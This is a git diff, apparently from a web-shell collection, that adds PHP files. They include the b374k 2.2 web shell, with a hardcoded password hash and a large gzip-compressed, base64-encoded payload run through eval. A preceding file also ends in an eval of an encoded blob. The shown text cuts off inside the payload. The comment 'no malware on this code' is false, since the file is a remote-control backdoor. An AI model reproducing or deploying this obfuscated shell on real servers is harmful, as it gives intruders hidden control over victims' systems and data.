+HHT9FigQHezE2n7hw9hGNXcJEEiYXlUDkOZBiUZlFQEIZELfrGOwzinEHLvgsmgXpiOkLXysRx6/
+tthbwzidpFbDYW+eJUUnJyctwy/P3Gkw0Jd4aR8yoEe5iNcdspYiUpb338TTrWhBShbQncj72pk6
+Eeb24371DztEo3TXfdw7S6clkkoIN/y2w/9PYgUD3vZQsxhzb/Vnjzw7/qWMzxF06ErNL9VHkRLQ
+BGSO+xCKOky6W4HfgMLwEA3HPxRL8Xg2Dg5yLJfznFSjwhUBQ8OeV+iBMOaoQ/qyGwg1Hin81BMQ
+YR+tezCoBTOD+zD5rsnL84qQG5qD3C43c9i6VGguHEwvxfhaMn3AhvHodnCOI48wpEvrlGyynIG4
+NNZ6EBV0NEYVpURbzn6lWEtgjJgdHIeZCgoSK31NptRXy1Yk1GrgjqvcJYqzWPW/iKosAPP4i/QK
+E2FNkNFuTC0HAYZEL3y8YyDJEm0dAAgFkGbJm2oqwt7cH6Xh1PrKACxlCBpdKQ1nYdMC+L+zzyKh
+16OVHfJTjydiGweCOJ0ijKf1YguqqA52hAATwJWMEzB/uHjqlG9eGDTyhD8G7BHdkWUhuJoXga9F
+oWEZIcY7wNh98M2aWCrwJ2XHCMjbL9ldihLzXsDJW+oOY4kaFDwR8d75wFrnCMeJG38GD6OSOyOc
+KYHltsOFHyWiYEQzHAe8bdFQSl8Ol/uPHHSEAf6sVI4xyV4+/7rwtDXRncUhxqWI8P3D1haMtEyk
+QDba8KAXQHwIYwwfyghSQF6SAjKWA7lAZwPMCHYRreyKwmLzujHdQYwVxb8LSqVSKWyz9UUTnZtv
+3oLuzQPUoaTenAoC8OcNk5w+mLrL0YFmgB9fmFyhI15hxOWHQse+wgn3X8pRfgwZfTeFWoZiQE/L
+NpIVVJ3ZNP8BxzjjRsLz0jFtNBEuFEvioCcdIjCJ5QtYG6B9zQTxGox8kQvBHQUJVVKc0LF5kJSF
+QhyFq/cSsI963VuAi8IXngTGOdG8uFIjHHDGpc7uxVjmoD8xbEBgx7hxyhSfhm3UHeuudDcCwxVX
+NuPOCE8oYi/J55Pl6fwZr8FL0hmS4XmHrCmoFeyqCjtrZIDtEOHgNzewFiIpYqoR5zAIX3rnTGNI
+lIMQxflnYZ0QruRhLm99TZLE1fydeq998eLR15/VhTiTQMke1xon1ZvWq0a4+lU9OmiCofxZW5Rw
+ICTGb20tl0H9ZETbWV7Hot0wNJu/fyZ3fkTFfX+H+HowZy4ZUAQe9pgIvblX478afv8+eyUc2S0p
+IHX28CbxnaGwTqCnH6hbCRhQDi4OlFVNBG9nCXDj8e0vlz9hSCc2t77KnsjST/k12VXDo428Io0s
+iJ/8uR5fAUrZlzEofiqT7CZuUkfi5zFJ844gz0knsIoBp+j0PPJeFROS08+Mnmysi8cYebr73CFN
+YDrNLnJIWWIclcvEOouf2DCBcnIZfH43jzX5sNf3lej65JnhzuHRlEgVLntSb1Uq70Xx4alVvys0
+yetxYWac5RJgWaqRpXL/oaR35dHwECK6vD4lrCfuEKPOQXuF0wkdLp3xJZi1xeYag9PB5HeH/AQ==";
+
+@eval(gzinflate(base64_decode($code)));
+?>
\ No newline at end of file
diff --git a/php/b374k.php.php b/php/b374k.php.php
new file mode 100644
index 0000000..5679116
--- /dev/null
+++ b/php/b374k.php.php
@@ -0,0 +1,266 @@
+<?php
+
+//*********************************************************************************************************************/
+// b374k 2.2
+// no malware on this code, you can check it by yourself ;-)
+//
+//
+// encrypt your password to md5 here http://kerinci.net/?x=decode
+
+$s_pass = "0de664ecd2be02cdd54234a0d1229b43"; // password (default is: b374k)
+
+eval("?>".gzinflate(base64_decode("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
